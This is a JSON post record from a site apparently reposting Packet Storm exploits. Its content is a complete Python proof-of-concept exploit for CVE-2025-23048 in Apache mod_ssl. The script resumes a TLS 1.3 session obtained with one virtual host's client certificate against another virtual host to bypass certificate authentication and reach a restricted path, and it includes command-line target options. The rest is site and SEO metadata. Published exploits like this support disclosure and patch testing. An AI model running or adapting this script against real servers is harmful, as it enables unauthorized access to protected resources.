{"id":32547,"date":"2025-12-23T11:54:36","date_gmt":"2025-12-23T11:54:36","guid":{"rendered":"http:\/\/localhost\/?p=32547"},"modified":"2025-12-23T11:54:36","modified_gmt":"2025-12-23T11:54:36","slug":"apache-modssl-tls-13-client-certificate-authentication-bypass","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=32547","title":{"rendered":"\ud83d\udcc4 Apache mod_ssl TLS 1.3 Client Certificate Authentication Bypass_PACKETSTORM:213257"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-12-23T17:16:27&#8243;,&#8221;description&#8221;:&#8221;Apache modssl TLS 1.3 client certificate authentication bypass proof of concept exploit&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-23T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-23T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Apache mod_ssl TLS 1.3 Client Certificate Authentication Bypass&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:213257&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-23048&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n    | # Title     : Apache mod_ssl TLS 1.3 Client Certificate Authentication Bypass                                                             |\\n    | # Author    : indoushka                                                                                                                   |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits)                                                            |\\n    | # Vendor    : https:\/\/httpd.apache.org\/docs\/current\/mod\/mod_ssl.html                                                                      |\\n    =============================================================================================================================================\\n    \\n    [+] References :  https:\/\/packetstorm.news\/files\/id\/210763\/ \\u0026 CVE-2025-23048\\n    \\n    [+] Summary    : A flaw in Apache mod_ssl TLS 1.3 session resumption allows a client-authenticated TLS session to be resumed across different virtual hosts without re-validating\\n                     the client certificate or trusted CA configuration.\\n    \\n    [+] Impact:\\n    \\n    An attacker with a valid client certificate for one virtual host can gain\\n    unauthorized access to another virtual host protected by a different CA.\\n    \\n    [+] Attack Vector:\\n    \\n    &#8211; TLS 1.3 Session Resumption\\n    &#8211; Client Certificate Authentication\\n    &#8211; Multiple Virtual Hosts\\n    \\n    [+] Tested Environment:\\n    \\n    &#8211; Apache HTTPD with mod_ssl\\n    &#8211; TLS 1.3 enabled\\n    &#8211; Client Certificate Authentication enabled\\n    &#8211; Multiple vhosts with different CA trust stores\\n    \\n    [+] POC :\\n    \\n    #!\/usr\/bin\/env python3\\n    \\n    import ssl\\n    import socket\\n    import sys\\n    import argparse\\n    from typing import Optional, Tuple\\n    import time\\n    \\n    class CVE2025_23048_Exploit:\\n        def __init__(self, host: str, port: int = 443):\\n            self.host = host\\n            self.port = port\\n            self.session_data = None\\n            \\n        def create_ssl_context(self, \\n                              certfile: Optional[str] = None,\\n                              keyfile: Optional[str] = None,\\n                              cafile: Optional[str] = None,\\n                              server_hostname: Optional[str] = None) -\\u003e ssl.SSLContext:\\n            \\&#8221;\\&#8221;\\&#8221;Create SSL context with specified parameters\\&#8221;\\&#8221;\\&#8221;\\n            context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)\\n            context.minimum_version = ssl.TLSVersion.TLSv1_3\\n            context.maximum_version = ssl.TLSVersion.TLSv1_3\\n            context.check_hostname = False\\n            context.verify_mode = ssl.CERT_NONE\\n            \\n            if cafile:\\n                context.load_verify_locations(cafile)\\n                context.verify_mode = ssl.CERT_REQUIRED\\n            \\n            if certfile and keyfile:\\n                context.load_cert_chain(certfile, keyfile)\\n                \\n            if server_hostname:\\n                context.server_hostname = server_hostname\\n                \\n            return context\\n        \\n        def perform_full_handshake(self, \\n                                  vhost: str,\\n                                  certfile: str,\\n                                  keyfile: str,\\n                                  cafile: str) -\\u003e Tuple[bool, bytes]:\\n            \\&#8221;\\&#8221;\\&#8221;\\n            Perform full TLS 1.3 handshake with client certificate\\n            Returns: (success, session_data)\\n            \\&#8221;\\&#8221;\\&#8221;\\n            print(f\\&#8221;[+] Performing full TLS 1.3 handshake with {vhost}\\&#8221;)\\n            \\n            context = self.create_ssl_context(\\n                certfile=certfile,\\n                keyfile=keyfile,\\n                cafile=cafile,\\n                server_hostname=vhost\\n            )\\n            \\n            try:\\n                # Create socket and wrap with SSL\\n                sock = socket.create_connection((self.host, self.port))\\n                ssl_sock = context.wrap_socket(sock, server_hostname=vhost)\\n                \\n                # Get session data for resumption\\n                self.session_data = ssl_sock.session\\n                \\n                # Test access\\n                request = f\\&#8221;GET \/ HTTP\/1.1\\\\r\\\\nHost: {vhost}\\\\r\\\\n\\\\r\\\\n\\&#8221;\\n                ssl_sock.send(request.encode())\\n                response = ssl_sock.recv(4096)\\n                \\n                print(f\\&#8221;[*] Connected to {vhost}\\&#8221;)\\n                print(f\\&#8221;[*] HTTP Status: {response.decode().split(&#8216;\\\\\\\\r\\\\\\\\n&#8217;)[0]}\\&#8221;)\\n                print(f\\&#8221;[*] Session ticket captured: {self.session_data is not None}\\&#8221;)\\n                \\n                ssl_sock.close()\\n                return True, self.session_data\\n                \\n            except Exception as e:\\n                print(f\\&#8221;[-] Error during full handshake: {e}\\&#8221;)\\n                return False, None\\n        \\n        def resume_session(self, \\n                          vhost: str,\\n                          session_data: bytes,\\n                          cafile: Optional[str] = None,\\n                          protected_path: str = \\&#8221;\/\\&#8221;) -\\u003e bool:\\n            \\&#8221;\\&#8221;\\&#8221;\\n            Resume TLS session to different vhost\\n            Returns: True if bypass successful\\n            \\&#8221;\\&#8221;\\&#8221;\\n            print(f\\&#8221;\\\\n[+] Attempting session resumption to {vhost}\\&#8221;)\\n            \\n            context = self.create_ssl_context(\\n                cafile=cafile,\\n                server_hostname=vhost\\n            )\\n            \\n            try:\\n                # Set the session for resumption\\n                context.session = session_data\\n                \\n                # Connect with session resumption\\n                sock = socket.create_connection((self.host, self.port))\\n                ssl_sock = context.wrap_socket(sock, server_hostname=vhost)\\n                \\n                # Check if session was resumed\\n                if ssl_sock.session_reused:\\n                    print(f\\&#8221;[!] SUCCESS: Session resumed to {vhost}\\&#8221;)\\n                    \\n                    # Try to access protected resource\\n                    request = f\\&#8221;GET {protected_path} HTTP\/1.1\\\\r\\\\nHost: {vhost}\\\\r\\\\n\\\\r\\\\n\\&#8221;\\n                    ssl_sock.send(request.encode())\\n                    response = ssl_sock.recv(8192)\\n                    \\n                    response_str = response.decode(&#8216;utf-8&#8242;, errors=&#8217;ignore&#8217;)\\n                    status_line = response_str.split(&#8216;\\\\r\\\\n&#8217;)[0]\\n                    \\n                    print(f\\&#8221;[*] HTTP Response: {status_line}\\&#8221;)\\n                    \\n                    # Check if access was granted\\n                    if \\&#8221;200 OK\\&#8221; in status_line:\\n                        print(f\\&#8221;[!] CRITICAL: Unauthorized access successful!\\&#8221;)\\n                        print(f\\&#8221;[!] Accessed {protected_path} on {vhost} without valid certificate\\&#8221;)\\n                        \\n                        # Extract some response content\\n                        if \\&#8221;Vhost2 Secret\\&#8221; in response_str or \\&#8221;Restricted\\&#8221; in response_str:\\n                            print(f\\&#8221;[!] Confirmed access to protected content!\\&#8221;)\\n                            # Print snippet of response\\n                            lines = response_str.split(&#8216;\\\\r\\\\n&#8217;)\\n                            for line in lines[-10:]:  # Last 10 lines\\n                                if line.strip():\\n                                    print(f\\&#8221;    Content: {line[:100]}&#8230;\\&#8221;)\\n                        \\n                        return True\\n                    else:\\n                        print(f\\&#8221;[-] Access denied: {status_line}\\&#8221;)\\n                        return False\\n                else:\\n                    print(\\&#8221;[-] Session was not resumed (full handshake occurred)\\&#8221;)\\n                    return False\\n                    \\n            except Exception as e:\\n                print(f\\&#8221;[-] Error during session resumption: {e}\\&#8221;)\\n                return False\\n        \\n        def exploit(self, \\n                   vhost1: str,\\n                   cert1: str,\\n                   key1: str,\\n                   ca1: str,\\n                   vhost2: str,\\n                   ca2: str,\\n                   protected_path: str = \\&#8221;\/restricted\/\\&#8221;):\\n            \\&#8221;\\&#8221;\\&#8221;\\n            Complete exploitation chain\\n            \\&#8221;\\&#8221;\\&#8221;\\n            print(f\\&#8221;\\&#8221;\\&#8221;\\n            \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n            \u2551  Apache mod_ssl TLS 1.3 Client Certificate Authentication Bypass By indoushka  \u2551\\n            \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\n            \\n            Target: {self.host}:{self.port}\\n            Vhost1: {vhost1} (Legitimate access with CA1)\\n            Vhost2: {vhost2} (Should require CA2)\\n            Protected Path: {protected_path}\\n            \\&#8221;\\&#8221;\\&#8221;)\\n            \\n            # Step 1: Authenticate to vhost1\\n            print(\\&#8221;\\\\n\\&#8221; + \\&#8221;=\\&#8221;*60)\\n            print(\\&#8221;STEP 1: Legitimate authentication to first vhost\\&#8221;)\\n            print(\\&#8221;=\\&#8221;*60)\\n            \\n            success, session = self.perform_full_handshake(vhost1, cert1, key1, ca1)\\n            \\n            if not success or not session:\\n                print(\\&#8221;[-] Failed to establish initial session\\&#8221;)\\n                return False\\n            \\n            # Small delay\\n            time.sleep(1)\\n            \\n            # Step 2: Resume session to vhost2\\n            print(\\&#8221;\\\\n\\&#8221; + \\&#8221;=\\&#8221;*60)\\n            print(\\&#8221;STEP 2: Session resumption attack on second vhost\\&#8221;)\\n            print(\\&#8221;=\\&#8221;*60)\\n            \\n            # Try with CA2 (should fail in proper validation)\\n            # But with the vulnerability, session will be resumed without validation\\n            bypass_success = self.resume_session(\\n                vhost2, \\n                session, \\n                ca2,  # This CA won&#8217;t be properly checked during resumption\\n                protected_path\\n            )\\n            \\n            # Try also without any CA file (shouldn&#8217;t work but demonstrates the bug)\\n            print(\\&#8221;\\\\n\\&#8221; + \\&#8221;=\\&#8221;*60)\\n            print(\\&#8221;STEP 3: Testing without any CA validation\\&#8221;)\\n            print(\\&#8221;=\\&#8221;*60)\\n            \\n            bypass_without_ca = self.resume_session(\\n                vhost2,\\n                session,\\n                None,  # No CA file at all\\n                protected_path\\n            )\\n            \\n            if bypass_success or bypass_without_ca:\\n                print(\\&#8221;\\\\n[!] EXPLOIT SUCCESSFUL!\\&#8221;)\\n                print(\\&#8221;[!] Client certificate authentication was bypassed\\&#8221;)\\n                return True\\n            else:\\n                print(\\&#8221;\\\\n[-] Exploit failed\\&#8221;)\\n                return False\\n    \\n    \\n    def main():\\n        parser = argparse.ArgumentParser(\\n            description=\\&#8221;Apache mod_ssl TLS 1.3 Client Certificate Authentication Bypass By indoushka\\&#8221;\\n        )\\n        parser.add_argument(\\&#8221;&#8211;host\\&#8221;, required=True, help=\\&#8221;Target Apache server IP\\&#8221;)\\n        parser.add_argument(\\&#8221;&#8211;port\\&#8221;, type=int, default=443, help=\\&#8221;HTTPS port (default: 443)\\&#8221;)\\n        parser.add_argument(\\&#8221;&#8211;vhost1\\&#8221;, required=True, help=\\&#8221;First virtual hostname\\&#8221;)\\n        parser.add_argument(\\&#8221;&#8211;cert1\\&#8221;, required=True, help=\\&#8221;Client certificate for vhost1\\&#8221;)\\n        parser.add_argument(\\&#8221;&#8211;key1\\&#8221;, required=True, help=\\&#8221;Client private key for vhost1\\&#8221;)\\n        parser.add_argument(\\&#8221;&#8211;ca1\\&#8221;, required=True, help=\\&#8221;CA certificate for vhost1\\&#8221;)\\n        parser.add_argument(\\&#8221;&#8211;vhost2\\&#8221;, required=True, help=\\&#8221;Second virtual hostname to attack\\&#8221;)\\n        parser.add_argument(\\&#8221;&#8211;ca2\\&#8221;, required=True, help=\\&#8221;CA certificate that vhost2 should trust\\&#8221;)\\n        parser.add_argument(\\&#8221;&#8211;path\\&#8221;, default=\\&#8221;\/restricted\/\\&#8221;, help=\\&#8221;Protected path on vhost2\\&#8221;)\\n        \\n        args = parser.parse_args()\\n        \\n        # Check if required files exist\\n        import os\\n        for file in [args.cert1, args.key1, args.ca1, args.ca2]:\\n            if not os.path.exists(file):\\n                print(f\\&#8221;[-] File not found: {file}\\&#8221;)\\n                return\\n        \\n        exploit = CVE2025_23048_Exploit(args.host, args.port)\\n        exploit.exploit(\\n            vhost1=args.vhost1,\\n            cert1=args.cert1,\\n            key1=args.key1,\\n            ca1=args.ca1,\\n            vhost2=args.vhost2,\\n            ca2=args.ca2,\\n            protected_path=args.path\\n        )\\n    \\n    \\n    if __name__ == \\&#8221;__main__\\&#8221;:\\n        main()\\n    \\n    Greetings to :=====================================================================================\\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n    ===================================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/213257&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:9.1,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:N&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/213257\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-12-23T17:16:27&#8243;,&#8221;description&#8221;:&#8221;Apache modssl TLS 1.3 client certificate authentication bypass proof of concept exploit&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-23T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-23T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Apache mod_ssl TLS 1.3 Client Certificate Authentication Bypass&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:213257&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-23048&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n | # Title : Apache&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,10,12,13,53,7,11,5],"class_list":["post-32547","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-91","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 Apache mod_ssl TLS 1.3 Client Certificate Authentication Bypass_PACKETSTORM:213257 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=32547\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Apache mod_ssl TLS 1.3 Client Certificate Authentication Bypass_PACKETSTORM:213257 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2025-12-23T17:16:27&#8243;,&#8221;description&#8221;:&#8221;Apache modssl TLS 1.3 client certificate authentication bypass proof of concept exploit&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-23T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-23T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Apache mod_ssl TLS 1.3 Client Certificate Authentication Bypass&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:213257&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-23048&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================n | # Title : Apache...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=32547\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-23T11:54:36+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32547#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32547\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Apache mod_ssl TLS 1.3 Client Certificate Authentication Bypass_PACKETSTORM:213257\",\"datePublished\":\"2025-12-23T11:54:36+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32547\"},\"wordCount\":1527,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.1\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=32547#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32547\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32547\",\"name\":\"\ud83d\udcc4 Apache mod_ssl TLS 1.3 Client Certificate Authentication Bypass_PACKETSTORM:213257 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-23T11:54:36+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32547#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=32547\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32547#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Apache mod_ssl TLS 1.3 Client Certificate Authentication Bypass_PACKETSTORM:213257\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Apache mod_ssl TLS 1.3 Client Certificate Authentication Bypass_PACKETSTORM:213257 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=32547","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Apache mod_ssl TLS 1.3 Client Certificate Authentication Bypass_PACKETSTORM:213257 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2025-12-23T17:16:27&#8243;,&#8221;description&#8221;:&#8221;Apache modssl TLS 1.3 client certificate authentication bypass proof of concept exploit&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-23T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-23T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Apache mod_ssl TLS 1.3 Client Certificate Authentication Bypass&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:213257&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-23048&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================n | # Title : Apache...","og_url":"https:\/\/zero.redgem.net\/?p=32547","og_site_name":"zero redgem","article_published_time":"2025-12-23T11:54:36+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"8 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=32547#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=32547"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Apache mod_ssl TLS 1.3 Client Certificate Authentication Bypass_PACKETSTORM:213257","datePublished":"2025-12-23T11:54:36+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=32547"},"wordCount":1527,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.1","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=32547#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=32547","url":"https:\/\/zero.redgem.net\/?p=32547","name":"\ud83d\udcc4 Apache mod_ssl TLS 1.3 Client Certificate Authentication Bypass_PACKETSTORM:213257 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-12-23T11:54:36+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=32547#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=32547"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=32547#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Apache mod_ssl TLS 1.3 Client Certificate Authentication Bypass_PACKETSTORM:213257"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero 